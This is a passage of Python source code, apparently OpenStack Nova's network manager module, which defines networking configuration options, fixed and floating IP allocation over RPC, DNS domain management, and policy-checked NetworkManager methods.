# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Network Hosts are responsible for allocating ips and setting up network.
There are multiple backend drivers that handle specific types of networking
topologies. All of the network commands are issued to a subclass of
:class:`NetworkManager`.
**Related Flags**
:network_driver: Driver to use for network creation
:flat_network_bridge: Bridge device for simple network instances
:flat_interface: FlatDhcp will bridge into this interface if set
:flat_network_dns: Dns for simple network
:vlan_start: First VLAN for private networks
:vpn_ip: Public IP for the cloudpipe VPN servers
:vpn_start: First Vpn port for private networks
:cnt_vpn_clients: Number of addresses reserved for vpn clients
:network_size: Number of addresses in each private subnet
:floating_range: Floating IP address block
:fixed_range: Fixed IP address block
:fixed_ip_disassociate_timeout: Seconds after which a deallocated ip
is disassociated
:create_unique_mac_address_attempts: Number of times to attempt creating
a unique mac address
"""
import datetime
import functools
import itertools
import math
import re
import socket
from eventlet import greenpool
import netaddr
from nova.compute import api as compute_api
from nova import context
from nova import exception
from nova import flags
from nova import ipv6
from nova import manager
from nova.network import api as network_api
from nova.network import model as network_model
from nova.openstack.common import cfg
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common.notifier import api as notifier
from nova.openstack.common import rpc
from nova.openstack.common import timeutils
import nova.policy
from nova import quota
from nova import utils
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
network_opts = [
cfg.StrOpt('flat_network_bridge',
default=None,
help='Bridge for simple network instances'),
cfg.StrOpt('flat_network_dns',
default='8.8.4.4',
help='Dns for simple network'),
cfg.BoolOpt('flat_injected',
default=False,
help='Whether to attempt to inject network setup into guest'),
cfg.StrOpt('flat_interface',
default=None,
help='FlatDhcp will bridge into this interface if set'),
cfg.IntOpt('vlan_start',
default=100,
help='First VLAN for private networks'),
cfg.StrOpt('vlan_interface',
default=None,
help='vlans will bridge into this interface if set'),
cfg.IntOpt('num_networks',
default=1,
help='Number of networks to support'),
cfg.StrOpt('vpn_ip',
default='$my_ip',
help='Public IP for the cloudpipe VPN servers'),
cfg.IntOpt('vpn_start',
default=1000,
help='First Vpn port for private networks'),
cfg.BoolOpt('multi_host',
default=False,
help='Default value for multi_host in networks'),
cfg.IntOpt('network_size',
default=256,
help='Number of addresses in each private subnet'),
cfg.StrOpt('floating_range',
default='4.4.4.0/24',
help='Floating IP address block'),
cfg.StrOpt('default_floating_pool',
default='nova',
help='Default pool for floating ips'),
cfg.StrOpt('fixed_range',
default='10.0.0.0/8',
help='Fixed IP address block'),
cfg.StrOpt('fixed_range_v6',
default='fd00::/48',
help='Fixed IPv6 address block'),
cfg.StrOpt('gateway',
default=None,
help='Default IPv4 gateway'),
cfg.StrOpt('gateway_v6',
default=None,
help='Default IPv6 gateway'),
cfg.IntOpt('cnt_vpn_clients',
default=0,
help='Number of addresses reserved for vpn clients'),
cfg.IntOpt('fixed_ip_disassociate_timeout',
default=600,
help='Seconds after which a deallocated ip is disassociated'),
cfg.IntOpt('create_unique_mac_address_attempts',
default=5,
help='Number of attempts to create unique mac address'),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help='Autoassigning floating ip to VM'),
cfg.StrOpt('network_host',
default=socket.gethostname(),
help='Network host to use for ip allocation in flat modes'),
cfg.BoolOpt('fake_call',
default=False,
help='If True, skip using the queue and make local calls'),
cfg.BoolOpt('force_dhcp_release',
default=False,
help='If True, send a dhcp release on instance termination'),
cfg.StrOpt('dhcp_domain',
default='novalocal',
help='domain to use for building the hostnames'),
cfg.StrOpt('l3_lib',
default='nova.network.l3.LinuxNetL3',
help="Indicates underlying L3 management library")
]
FLAGS = flags.FLAGS
FLAGS.register_opts(network_opts)
class AddressAlreadyAllocated(exception.NovaException):
"""Address was already allocated."""
pass
class RPCAllocateFixedIP(object):
"""Mixin class originally for FlatDCHP and VLAN network managers.
used since they share code to RPC.call allocate_fixed_ip on the
correct network host to configure dnsmasq
"""
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
green_pool = greenpool.GreenPool()
vpn = kwargs.get('vpn')
requested_networks = kwargs.get('requested_networks')
for network in networks:
address = None
if requested_networks is not None:
for address in (fixed_ip for (uuid, fixed_ip) in
requested_networks if network['uuid'] == uuid):
break
# NOTE(vish): if we are not multi_host pass to the network host
# NOTE(tr3buchet): but if we are, host came from instance['host']
if not network['multi_host']:
host = network['host']
# NOTE(vish): if there is no network host, set one
if host is None:
host = rpc.call(context, FLAGS.network_topic,
{'method': 'set_network_host',
'args': {'network_ref':
jsonutils.to_primitive(network)}})
if host != self.host:
# need to call allocate_fixed_ip to correct network host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {}
args['instance_id'] = instance_id
args['network_id'] = network['id']
args['address'] = address
args['vpn'] = vpn
green_pool.spawn_n(rpc.call, context, topic,
{'method': '_rpc_allocate_fixed_ip',
'args': args})
else:
# i am the correct host, run here
self.allocate_fixed_ip(context, instance_id, network,
vpn=vpn, address=address)
# wait for all of the allocates (if any) to finish
green_pool.waitall()
def _rpc_allocate_fixed_ip(self, context, instance_id, network_id,
**kwargs):
"""Sits in between _allocate_fixed_ips and allocate_fixed_ip to
perform network lookup on the far side of rpc.
"""
network = self._get_network_by_id(context, network_id)
return self.allocate_fixed_ip(context, instance_id, network, **kwargs)
def deallocate_fixed_ip(self, context, address, host, **kwargs):
"""Call the superclass deallocate_fixed_ip if i'm the correct host
otherwise call to the correct host"""
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
network = self._get_network_by_id(context, fixed_ip['network_id'])
# NOTE(vish): if we are not multi_host pass to the network host
# NOTE(tr3buchet): but if we are, host came from instance['host']
if not network['multi_host']:
host = network['host']
if host != self.host:
# need to call deallocate_fixed_ip on correct network host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {'address': address,
'host': host}
rpc.call(context, topic,
{'method': 'deallocate_fixed_ip',
'args': args})
else:
# i am the correct host, run here
super(RPCAllocateFixedIP, self).deallocate_fixed_ip(context,
address)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution"""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
nova.policy.enforce(context, _action, target)
class FloatingIP(object):
"""Mixin class for adding floating IP functionality to a manager."""
def init_host_floating_ips(self):
"""Configures floating ips owned by host."""
admin_context = context.get_admin_context()
try:
floating_ips = self.db.floating_ip_get_all_by_host(admin_context,
self.host)
except exception.NotFound:
return
for floating_ip in floating_ips:
fixed_ip_id = floating_ip.get('fixed_ip_id')
if fixed_ip_id:
try:
fixed_ip_ref = self.db.fixed_ip_get(admin_context,
fixed_ip_id)
except exception.FixedIpNotFound:
msg = _('Fixed ip %(fixed_ip_id)s not found') % locals()
LOG.debug(msg)
continue
fixed_address = fixed_ip_ref['address']
interface = FLAGS.public_interface or floating_ip['interface']
try:
self.l3driver.add_floating_ip(floating_ip['address'],
fixed_address, interface)
except exception.ProcessExecutionError:
LOG.debug(_('Interface %(interface)s not found'), locals())
raise exception.NoFloatingIpInterface(interface=interface)
@wrap_check_policy
def allocate_for_instance(self, context, **kwargs):
"""Handles allocating the floating IP resources for an instance.
calls super class allocate_for_instance() as well
rpc.called by network_api
"""
instance_id = kwargs.get('instance_id')
instance_uuid = kwargs.get('instance_uuid')
project_id = kwargs.get('project_id')
requested_networks = kwargs.get('requested_networks')
LOG.debug(_("floating IP allocation for instance |%s|"),
instance_uuid=instance_uuid, context=context)
# call the next inherited class's allocate_for_instance()
# which is currently the NetworkManager version
# do this first so fixed ip is already allocated
nw_info = super(FloatingIP, self).allocate_for_instance(context,
**kwargs)
if FLAGS.auto_assign_floating_ip:
# allocate a floating ip
floating_address = self.allocate_floating_ip(context, project_id)
# set auto_assigned column to true for the floating ip
self.db.floating_ip_set_auto_assigned(context, floating_address)
# get the first fixed address belonging to the instance
fixed_ips = nw_info.fixed_ips()
fixed_address = fixed_ips[0]['address']
# associate the floating ip to fixed_ip
self.associate_floating_ip(context,
floating_address,
fixed_address,
affect_auto_assigned=True)
return nw_info
@wrap_check_policy
def deallocate_for_instance(self, context, **kwargs):
"""Handles deallocating floating IP resources for an instance.
calls super class deallocate_for_instance() as well.
rpc.called by network_api
"""
instance_id = kwargs.get('instance_id')
# NOTE(francois.charlier): in some cases the instance might be
# deleted before the IPs are released, so we need to get deleted
# instances too
read_deleted_context = context.elevated(read_deleted='yes')
instance = self.db.instance_get(read_deleted_context, instance_id)
LOG.debug(_("floating IP deallocation for instance |%s|"),
instance=instance, context=read_deleted_context)
try:
fixed_ips = self.db.fixed_ip_get_by_instance(read_deleted_context,
instance['uuid'])
except exception.FixedIpNotFoundForInstance:
fixed_ips = []
# add to kwargs so we can pass to super to save a db lookup there
kwargs['fixed_ips'] = fixed_ips
for fixed_ip in fixed_ips:
fixed_id = fixed_ip['id']
floating_ips = self.db.floating_ip_get_by_fixed_ip_id(context,
fixed_id)
# disassociate floating ips related to fixed_ip
for floating_ip in floating_ips:
address = floating_ip['address']
try:
self.disassociate_floating_ip(read_deleted_context,
address,
affect_auto_assigned=True)
except exception.FloatingIpNotAssociated:
LOG.exception(_("Floating IP is not associated. Ignore."))
# deallocate if auto_assigned
if floating_ip['auto_assigned']:
self.deallocate_floating_ip(read_deleted_context, address,
affect_auto_assigned=True)
# call the next inherited class's deallocate_for_instance()
# which is currently the NetworkManager version
# call this after so floating IPs are handled first
super(FloatingIP, self).deallocate_for_instance(context, **kwargs)
def _floating_ip_owned_by_project(self, context, floating_ip):
"""Raises if floating ip does not belong to project"""
if floating_ip['project_id'] != context.project_id:
if floating_ip['project_id'] is None:
LOG.warn(_('Address |%(address)s| is not allocated'),
{'address': floating_ip['address']})
raise exception.NotAuthorized()
else:
LOG.warn(_('Address |%(address)s| is not allocated to your '
'project |%(project)s|'),
{'address': floating_ip['address'],
'project': context.project_id})
raise exception.NotAuthorized()
@wrap_check_policy
def allocate_floating_ip(self, context, project_id, pool=None):
"""Gets a floating ip from the pool."""
# NOTE(tr3buchet): all network hosts in zone now use the same pool
pool = pool or FLAGS.default_floating_pool
# Check the quota; can't put this in the API because we get
# called into from other places
try:
reservations = QUOTAS.reserve(context, floating_ips=1)
except exception.OverQuota:
pid = context.project_id
LOG.warn(_("Quota exceeded for %(pid)s, tried to allocate "
"floating IP") % locals())
raise exception.FloatingIpLimitExceeded()
try:
floating_ip = self.db.floating_ip_allocate_address(context,
project_id,
pool)
payload = dict(project_id=project_id, floating_ip=floating_ip)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.allocate',
notifier.INFO, payload)
# Commit the reservations
QUOTAS.commit(context, reservations)
except Exception:
with excutils.save_and_reraise_exception():
QUOTAS.rollback(context, reservations)
return floating_ip
@wrap_check_policy
def deallocate_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Returns an floating ip to the pool."""
floating_ip = self.db.floating_ip_get_by_address(context, address)
# handle auto_assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
# make sure project ownz this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# make sure floating ip is not associated
if floating_ip['fixed_ip_id']:
floating_address = floating_ip['address']
raise exception.FloatingIpAssociated(address=floating_address)
# clean up any associated DNS entries
self._delete_all_entries_for_ip(context,
floating_ip['address'])
payload = dict(project_id=floating_ip['project_id'],
floating_ip=floating_ip['address'])
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.deallocate',
notifier.INFO, payload=payload)
# Get reservations...
try:
reservations = QUOTAS.reserve(context, floating_ips=-1)
except Exception:
reservations = None
LOG.exception(_("Failed to update usages deallocating "
"floating IP"))
self.db.floating_ip_deallocate(context, address)
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations)
@wrap_check_policy
def associate_floating_ip(self, context, floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Makes sure everything makes sense then calls _associate_floating_ip,
rpc'ing to correct host if i'm not it.
"""
floating_ip = self.db.floating_ip_get_by_address(context,
floating_address)
# handle auto_assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
# make sure project ownz this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# disassociate any already associated
orig_instance_uuid = None
if floating_ip['fixed_ip_id']:
# find previously associated instance
fixed_ip = self.db.fixed_ip_get(context,
floating_ip['fixed_ip_id'])
orig_instance_uuid = fixed_ip['instance_uuid']
self.disassociate_floating_ip(context, floating_address)
fixed_ip = self.db.fixed_ip_get_by_address(context, fixed_address)
# send to correct host, unless i'm the correct host
network = self._get_network_by_id(context.elevated(),
fixed_ip['network_id'])
if network['multi_host']:
instance = self.db.instance_get_by_uuid(context,
fixed_ip['instance_uuid'])
host = instance['host']
else:
host = network['host']
interface = FLAGS.public_interface or floating_ip['interface']
if host == self.host:
# i'm the correct host
self._associate_floating_ip(context, floating_address,
fixed_address, interface)
else:
# send to correct host
rpc.call(context,
rpc.queue_get_for(context, FLAGS.network_topic, host),
{'method': '_associate_floating_ip',
'args': {'floating_address': floating_address,
'fixed_address': fixed_address,
'interface': interface}})
return orig_instance_uuid
def _associate_floating_ip(self, context, floating_address, fixed_address,
interface):
"""Performs db and driver calls to associate floating ip & fixed ip"""
# associate floating ip
self.db.floating_ip_fixed_ip_associate(context,
floating_address,
fixed_address,
self.host)
try:
# gogo driver time
self.l3driver.add_floating_ip(floating_address, fixed_address,
interface)
except exception.ProcessExecutionError as e:
fixed_address = self.db.floating_ip_disassociate(context,
floating_address)
if "Cannot find device" in str(e):
LOG.error(_('Interface %(interface)s not found'), locals())
raise exception.NoFloatingIpInterface(interface=interface)
payload = dict(project_id=context.project_id,
floating_ip=floating_address)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.associate',
notifier.INFO, payload=payload)
@wrap_check_policy
def disassociate_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from its fixed ip.
Makes sure everything makes sense then calls _disassociate_floating_ip,
rpc'ing to correct host if i'm not it.
"""
floating_ip = self.db.floating_ip_get_by_address(context, address)
# handle auto assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
# make sure project ownz this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# make sure floating ip is associated
if not floating_ip.get('fixed_ip_id'):
floating_address = floating_ip['address']
raise exception.FloatingIpNotAssociated(address=floating_address)
fixed_ip = self.db.fixed_ip_get(context, floating_ip['fixed_ip_id'])
# send to correct host, unless i'm the correct host
network = self._get_network_by_id(context, fixed_ip['network_id'])
if network['multi_host']:
instance = self.db.instance_get_by_uuid(context,
fixed_ip['instance_uuid'])
host = instance['host']
else:
host = network['host']
interface = FLAGS.public_interface or floating_ip['interface']
if host == self.host:
# i'm the correct host
self._disassociate_floating_ip(context, address, interface)
else:
# send to correct host
rpc.call(context,
rpc.queue_get_for(context, FLAGS.network_topic, host),
{'method': '_disassociate_floating_ip',
'args': {'address': address,
'interface': interface}})
def _disassociate_floating_ip(self, context, address, interface):
"""Performs db and driver calls to disassociate floating ip"""
# disassociate floating ip
fixed_address = self.db.floating_ip_disassociate(context, address)
# go go driver time
self.l3driver.remove_floating_ip(address, fixed_address, interface)
payload = dict(project_id=context.project_id, floating_ip=address)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.disassociate',
notifier.INFO, payload=payload)
@wrap_check_policy
def get_floating_ip(self, context, id):
"""Returns a floating IP as a dict"""
return dict(self.db.floating_ip_get(context, id).iteritems())
@wrap_check_policy
def get_floating_pools(self, context):
"""Returns list of floating pools"""
pools = self.db.floating_ip_get_pools(context)
return [dict(pool.iteritems()) for pool in pools]
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
"""Returns a floating IP as a dict"""
return dict(self.db.floating_ip_get_by_address(context,
address).iteritems())
@wrap_check_policy
def get_floating_ips_by_project(self, context):
"""Returns the floating IPs allocated to a project"""
ips = self.db.floating_ip_get_all_by_project(context,
context.project_id)
return [dict(ip.iteritems()) for ip in ips]
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
"""Returns the floating IPs associated with a fixed_address"""
floating_ips = self.db.floating_ip_get_by_fixed_address(context,
fixed_address)
return [floating_ip['address'] for floating_ip in floating_ips]
def _prepare_domain_entry(self, context, domain):
domainref = self.db.dnsdomain_get(context, domain)
scope = domainref.scope
if scope == 'private':
av_zone = domainref.availability_zone
this_domain = {'domain': domain,
'scope': scope,
'availability_zone': av_zone}
else:
project = domainref.project_id
this_domain = {'domain': domain,
'scope': scope,
'project': project}
return this_domain
@wrap_check_policy
def get_dns_domains(self, context):
domains = []
db_domain_list = self.db.dnsdomain_list(context)
floating_driver_domain_list = self.floating_dns_manager.get_domains()
instance_driver_domain_list = self.instance_dns_manager.get_domains()
for db_domain in db_domain_list:
if (db_domain in floating_driver_domain_list or
db_domain in instance_driver_domain_list):
domain_entry = self._prepare_domain_entry(context,
db_domain)
if domain_entry:
domains.append(domain_entry)
else:
LOG.warn(_('Database inconsistency: DNS domain |%s| is '
'registered in the Nova db but not visible to '
'either the floating or instance DNS driver. It '
'will be ignored.'), db_domain)
return domains
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
self.floating_dns_manager.create_entry(name, address,
dns_type, domain)
@wrap_check_policy
def modify_dns_entry(self, context, address, name, domain):
self.floating_dns_manager.modify_address(name, address,
domain)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
self.floating_dns_manager.delete_entry(name, domain)
def _delete_all_entries_for_ip(self, context, address):
domain_list = self.get_dns_domains(context)
for domain in domain_list:
names = self.get_dns_entries_by_address(context,
address,
domain['domain'])
for name in names:
self.delete_dns_entry(context, name, domain['domain'])
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
return self.floating_dns_manager.get_entries_by_address(address,
domain)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
return self.floating_dns_manager.get_entries_by_name(name,
domain)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, av_zone):
self.db.dnsdomain_register_for_zone(context, domain, av_zone)
try:
self.instance_dns_manager.create_domain(domain)
except exception.FloatingIpDNSExists:
LOG.warn(_('Domain |%(domain)s| already exists, '
'changing zone to |%(av_zone)s|.'),
{'domain': domain, 'av_zone': av_zone})
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project):
self.db.dnsdomain_register_for_project(context, domain, project)
try:
self.floating_dns_manager.create_domain(domain)
except exception.FloatingIpDNSExists:
LOG.warn(_('Domain |%(domain)s| already exists, '
'changing project to |%(project)s|.'),
{'domain': domain, 'project': project})
@wrap_check_policy
def delete_dns_domain(self, context, domain):
self.db.dnsdomain_unregister(context, domain)
self.floating_dns_manager.delete_domain(domain)
def _get_project_for_domain(self, context, domain):
return self.db.dnsdomain_project(context, domain)
class NetworkManager(manager.SchedulerDependentManager):
"""Implements common network manager functionality.
This class must be subclassed to support specific topologies.
host management:
hosts configure themselves for networks they are assigned to in the
table upon startup. If there are networks in the table which do not
have hosts, those will be filled in and have hosts configured
as the hosts pick them up one at time during their periodic task.
The one at a time part is to flatten the layout to help scale
"""
# If True, this manager requires VIF to create a bridge.
SHOULD_CREATE_BRIDGE = False
# If True, this manager requires VIF to create VLAN tag.
SHOULD_CREATE_VLAN = False
# if True, this manager leverages DHCP
DHCP = False
timeout_fixed_ips = True
def __init__(self, network_driver=None, *args, **kwargs):
if not network_driver:
network_driver = FLAGS.network_driver
self.driver = importutils.import_module(network_driver)
temp = importutils.import_object(FLAGS.instance_dns_manager)
self.instance_dns_manager = temp
self.instance_dns_domain = FLAGS.instance_dns_domain
temp = importutils.import_object(FLAGS.floating_ip_dns_manager)
self.floating_dns_manager = temp
self.network_api = network_api.API()
self.security_group_api = compute_api.SecurityGroupAPI()
self.compute_api = compute_api.API(
security_group_api=self.security_group_api)
# NOTE(tr3buchet: unless manager subclassing NetworkManager has
# already imported ipam, import nova ipam here
if not hasattr(self, 'ipam'):
self._import_ipam_lib('nova.network.nova_ipam_lib')
l3_lib = kwargs.get("l3_lib", FLAGS.l3_lib)
self.l3driver = importutils.import_object(l3_lib)
super(NetworkManager, self).__init__(service_name='network',
*args, **kwargs)
def _import_ipam_lib(self, ipam_lib):
self.ipam = importutils.import_module(ipam_lib).get_ipam_lib(self)
@utils.synchronized('get_dhcp')
def _get_dhcp_ip(self, context, network_ref, host=None):
"""Get the proper dhcp address to listen on."""
# NOTE(vish): this is for compatibility
if not network_ref.get('multi_host'):
return network_ref['gateway']
if not host:
host = self.host
network_id = network_ref['id']
try:
fip = self.db.fixed_ip_get_by_network_host(context,
network_id,
host)
return fip['address']
except exception.FixedIpNotFoundForNetworkHost:
elevated = context.elevated()
return self.db.fixed_ip_associate_pool(elevated,
network_id,
host=host)
def get_dhcp_leases(self, ctxt, network_ref):
"""Broker the request to the driver to fetch the dhcp leases"""
return self.driver.get_dhcp_leases(ctxt, network_ref)
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
# NOTE(vish): Set up networks for which this host already has
# an ip address.
ctxt = context.get_admin_context()
for network in self.db.network_get_all_by_host(ctxt, self.host):
self._setup_network_on_host(ctxt, network)
@manager.periodic_task
def _disassociate_stale_fixed_ips(self, context):
if self.timeout_fixed_ips:
now = timeutils.utcnow()
timeout = FLAGS.fixed_ip_disassociate_timeout
time = now - datetime.timedelta(seconds=timeout)
num = self.db.fixed_ip_disassociate_all_by_timeout(context,
self.host,
time)
if num:
LOG.debug(_('Disassociated %s stale fixed ip(s)'), num)
def set_network_host(self, context, network_ref):
"""Safely sets the host of the network."""
LOG.debug(_('setting network host'), context=context)
host = self.db.network_set_host(context,
network_ref['id'],
self.host)
return host
def _do_trigger_security_group_members_refresh_for_instance(self,
instance_id):
# NOTE(francois.charlier): the instance may have been deleted already
# thus enabling `read_deleted`
admin_context = context.get_admin_context(read_deleted='yes')
if utils.is_uuid_like(instance_id):
instance_ref = self.db.instance_get_by_uuid(admin_context,
instance_id)
else:
instance_ref = self.db.instance_get(admin_context, instance_id)
groups = instance_ref['security_groups']
group_ids = [group['id'] for group in groups]
self.security_group_api.trigger_members_refresh(admin_context,
group_ids)
self.security_group_api.trigger_handler('security_group_members',
admin_context, group_ids)
def get_floating_ips_by_fixed_address(self, context, fixed_address):
# NOTE(jkoelker) This is just a stub function. Managers supporting
# floating ips MUST override this or use the Mixin
return []
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
fixed_ip_filter = filters.get('fixed_ip')
ip_filter = re.compile(str(filters.get('ip')))
ipv6_filter = re.compile(str(filters.get('ip6')))
# NOTE(jkoelker) Should probably figure out a better way to do
# this. But for now it "works", this could suck on
# large installs.
vifs = self.db.virtual_interface_get_all(context)
results = []
for vif in vifs:
if vif['instance_uuid'] is None:
continue
network = self._get_network_by_id(context, vif['network_id'])
fixed_ipv6 = None
if network['cidr_v6'] is not None:
fixed_ipv6 = ipv6.to_global(network['cidr_v6'],
vif['address'],
context.project_id)
if fixed_ipv6 and ipv6_filter.match(fixed_ipv6):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ipv6})
vif_id = vif['id']
fixed_ips = self.db.fixed_ips_by_virtual_interface(context,
vif_id)
for fixed_ip in fixed_ips:
if not fixed_ip or not fixed_ip['address']:
continue
if fixed_ip['address'] == fixed_ip_filter:
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ip['address']})
continue
if ip_filter.match(fixed_ip['address']):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ip['address']})
continue
for floating_ip in fixed_ip.get('floating_ips', []):
if not floating_ip or not floating_ip['address']:
continue
if ip_filter.match(floating_ip['address']):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': floating_ip['address']})
continue
return results
def _get_networks_for_instance(self, context, instance_id, project_id,
requested_networks=None):
"""Determine & return which networks an instance should connect to."""
# TODO(tr3buchet) maybe this needs to be updated in the future if
# there is a better way to determine which networks
# a non-vlan instance should connect to
if requested_networks is not None and len(requested_networks) != 0:
network_uuids = [uuid for (uuid, fixed_ip) in requested_networks]
networks = self.db.network_get_all_by_uuids(context, network_uuids)
else:
try:
networks = self.db.network_get_all(context)
except exception.NoNetworksFound:
return []
# return only networks which are not vlan networks
return [network for network in networks if
not network['vlan']]
@wrap_check_policy
def allocate_for_instance(self, context, **kwargs):
"""Handles allocating the various network resources for an instance.
rpc.called by network_api
"""
instance_id = kwargs['instance_id']
instance_uuid = kwargs['instance_uuid']
host = kwargs['host']
project_id = kwargs['project_id']
rxtx_factor = kwargs['rxtx_factor']
requested_networks = kwargs.get('requested_networks')
vpn = kwargs['vpn']
admin_context = context.elevated()
LOG.debug(_("network allocations"), instance_uuid=instance_uuid,
context=context)
networks = self._get_networks_for_instance(admin_context,
instance_id, project_id,
requested_networks=requested_networks)
LOG.debug(_('networks retrieved for instance: |%(networks)s|'),
locals(), context=context, instance_uuid=instance_uuid)
self._allocate_mac_addresses(context, instance_uuid, networks)
self._allocate_fixed_ips(admin_context, instance_id,
host, networks, vpn=vpn,
requested_networks=requested_networks)
return self.get_instance_nw_info(context, instance_id, instance_uuid,
rxtx_factor, host)
@wrap_check_policy
def deallocate_for_instance(self, context, **kwargs):
"""Handles deallocating various network resources for an instance.
rpc.called by network_api
kwargs can contain fixed_ips to circumvent another db lookup
"""
# NOTE(francois.charlier): in some cases the instance might be
# deleted before the IPs are released, so we need to get deleted
# instances too
read_deleted_context = context.elevated(read_deleted='yes')
instance_id = kwargs.pop('instance_id')
instance = self.db.instance_get(read_deleted_context, instance_id)
try:
fixed_ips = (kwargs.get('fixed_ips') or
self.db.fixed_ip_get_by_instance(read_deleted_context,
instance['uuid']))
except exception.FixedIpNotFoundForInstance:
fixed_ips = []
LOG.debug(_("network deallocation for instance"), instance=instance,
context=read_deleted_context)
# deallocate fixed ips
for fixed_ip in fixed_ips:
self.deallocate_fixed_ip(context, fixed_ip['address'], **kwargs)
# deallocate vifs (mac addresses)
self.db.virtual_interface_delete_by_instance(read_deleted_context,
instance['uuid'])
@wrap_check_policy
def get_instance_nw_info(self, context, instance_id, instance_uuid,
rxtx_factor, host, **kwargs):
"""Creates network info list for instance.
called by allocate_for_instance and network_api
context needs to be elevated
:returns: network info list [(network,info),(network,info)...]
where network = dict containing pertinent data from a network db object
and info = dict containing pertinent networking data
"""
vifs = self.db.virtual_interface_get_by_instance(context,
instance_uuid)
networks = {}
for vif in vifs:
if vif.get('network_id') is not None:
network = self._get_network_by_id(context, vif['network_id'])
networks[vif['uuid']] = network
nw_info = self.build_network_info_model(context, vifs, networks,
rxtx_factor, host)
return nw_info
def build_network_info_model(self, context, vifs, networks,
rxtx_factor, instance_host):
"""Builds a NetworkInfo object containing all network information
for an instance"""
nw_info = network_model.NetworkInfo()
for vif in vifs:
vif_dict = {'id': vif['uuid'],
'address': vif['address']}
# handle case where vif doesn't have a network
if not networks.get(vif['uuid']):
vif = network_model.VIF(**vif_dict)
nw_info.append(vif)
continue
# get network dict for vif from args and build the subnets
network = networks[vif['uuid']]
subnets = self._get_subnets_from_network(context, network, vif,
instance_host)
# if rxtx_cap data are not set everywhere, set to none
try:
rxtx_cap = network['rxtx_base'] * rxtx_factor
except (TypeError, KeyError):
rxtx_cap = None
# get fixed_ips
v4_IPs = self.ipam.get_v4_ips_by_interface(context,
network['uuid'],
vif['uuid'],
network['project_id'])
v6_IPs = self.ipam.get_v6_ips_by_interface(context,
network['uuid'],
vif['uuid'],
network['project_id'])
# create model FixedIPs from these fixed_ips
network_IPs = [network_model.FixedIP(address=ip_address)
for ip_address in v4_IPs + v6_IPs]
# get floating_ips for each fixed_ip
# add them to the fixed ip
for fixed_ip in network_IPs:
if fixed_ip['version'] == 6:
continue
gfipbfa = self.ipam.get_floating_ips_by_fixed_address
floating_ips = gfipbfa(context, fixed_ip['address'])
floating_ips = [network_model.IP(address=ip['address'],
type='floating')
for ip in floating_ips]
for ip in floating_ips:
fixed_ip.add_floating_ip(ip)
# add ips to subnets they belong to
for subnet in subnets:
subnet['ips'] = [fixed_ip for fixed_ip in network_IPs
if fixed_ip.is_in_subnet(subnet)]
# convert network into a Network model object
network = network_model.Network(**self._get_network_dict(network))
# since network currently has no subnets, easily add them all
network['subnets'] = subnets
# add network and rxtx cap to vif_dict
vif_dict['network'] = network
if rxtx_cap:
vif_dict['rxtx_cap'] = rxtx_cap
# create the vif model and add to network_info
vif = network_model.VIF(**vif_dict)
nw_info.append(vif)
return nw_info
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = {'id': network['uuid'],
'bridge': network['bridge'],
'label': network['label'],
'tenant_id': network['project_id']}
# get extra information
if network.get('injected'):
network_dict['injected'] = network['injected']
return network_dict
def _get_subnets_from_network(self, context, network,
vif, instance_host=None):
"""Returns the 1 or 2 possible subnets for a nova network"""
# get subnets
ipam_subnets = self.ipam.get_subnets_by_net_id(context,
network['project_id'], network['uuid'], vif['uuid'])
subnets = []
for subnet in ipam_subnets:
subnet_dict = {'cidr': subnet['cidr'],
'gateway': network_model.IP(
address=subnet['gateway'],
type='gateway')}
# deal with dhcp
if self.DHCP:
if network.get('multi_host'):
dhcp_server = self._get_dhcp_ip(context, network,
instance_host)
else:
dhcp_server = self._get_dhcp_ip(context, subnet)
